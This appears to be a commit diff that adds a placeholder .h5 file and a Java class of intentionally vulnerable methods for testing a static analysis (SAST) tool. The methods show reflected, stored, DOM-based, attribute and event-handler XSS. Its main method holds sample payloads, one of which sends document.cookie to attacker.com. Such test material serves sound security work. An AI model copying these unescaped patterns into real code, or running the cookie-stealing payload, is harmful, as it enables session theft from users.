Test new policy

example-plaintext.h5

@@ -0,0 +1 @@
+Testing a h5 file with plain text.

src/main/java/com/example/vuln/XSSVulnerabilityDemo.java

@@ -0,0 +1,91 @@
+package com.example.vuln;
+
+/**
+ * Demonstrates Cross-Site Scripting (XSS) vulnerabilities.
+ * Includes both reflected and stored XSS examples for SAST testing.
+ */
+public class XSSVulnerabilityDemo {
+
+    /**
+     * Reflected XSS: User input is directly echoed back in HTML response without sanitization.
+     * An attacker can craft a URL with malicious JavaScript that executes in the victim's browser.
+     */
+    public static String reflectedXSS(String userInput) {
+        // UNSAFE: directly embedding user input into HTML
+        String html = "<html><body>";
+        html += "<h1>Search Results</h1>";
+        html += "<p>You searched for: " + userInput + "</p>";
+        html += "</body></html>";
+        return html;
+    }
+
+    /**
+     * Stored XSS: User input is stored in a database and later displayed to other users
+     * without sanitization. This is more dangerous than reflected XSS.
+     */
+    public static String storedXSSSimulation(String userComment) {
+        // In a real app, this would be stored in a database
+        // Here we simulate retrieving and displaying it unsafely
+        String html = "<div class='comment'>";
+        html += "<p>User Comment: " + userComment + "</p>";
+        html += "</div>";
+        return html;
+    }
+
+    /**
+     * DOM-based XSS: JavaScript manipulates the DOM using untrusted data.
+     * This example shows a Java method that generates JavaScript code with user input.
+     */
+    public static String domBasedXSS(String dataFromUrl) {
+        // UNSAFE: embedding user input directly into JavaScript
+        String js = "var userData = '" + dataFromUrl + "';";
+        js += "document.getElementById('content').innerHTML = userData;";
+        return js;
+    }
+
+    /**
+     * XSS via attribute injection: User input used in HTML attributes without escaping.
+     */
+    public static String attributeXSS(String userId) {
+        // UNSAFE: user input in HTML attribute
+        String html = "<input type='hidden' value='" + userId + "' />";
+        return html;
+    }
+
+    /**
+     * XSS via event handler: User input used in event handler attributes.
+     */
+    public static String eventHandlerXSS(String userAction) {
+        // UNSAFE: user input in onclick handler
+        String html = "<button onclick=\"performAction('" + userAction + "')\">Click me</button>";
+        return html;
+    }
+
+    /**
+     * Demonstration of how these vulnerabilities would be exploited.
+     */
+    public static void main(String[] args) {
+        // Example payloads (all fake and for testing only)
+        String maliciousPayload = "<script>alert('XSS')</script>";
+        String imgPayload = "<img src=x onerror=\"fetch('http://attacker.com/steal?data='+document.cookie)\">";
+
+        System.out.println("Reflected XSS result:");
+        System.out.println(reflectedXSS(maliciousPayload));
+        System.out.println();
+
+        System.out.println("Stored XSS result:");
+        System.out.println(storedXSSSimulation(imgPayload));
+        System.out.println();
+
+        System.out.println("DOM-based XSS JavaScript:");
+        System.out.println(domBasedXSS(maliciousPayload));
+        System.out.println();
+
+        System.out.println("Attribute XSS result:");
+        System.out.println(attributeXSS("' onload='alert(1)'"));
+        System.out.println();
+
+        System.out.println("Event handler XSS result:");
+        System.out.println(eventHandlerXSS("alert('XSS from event')"));
+    }
+}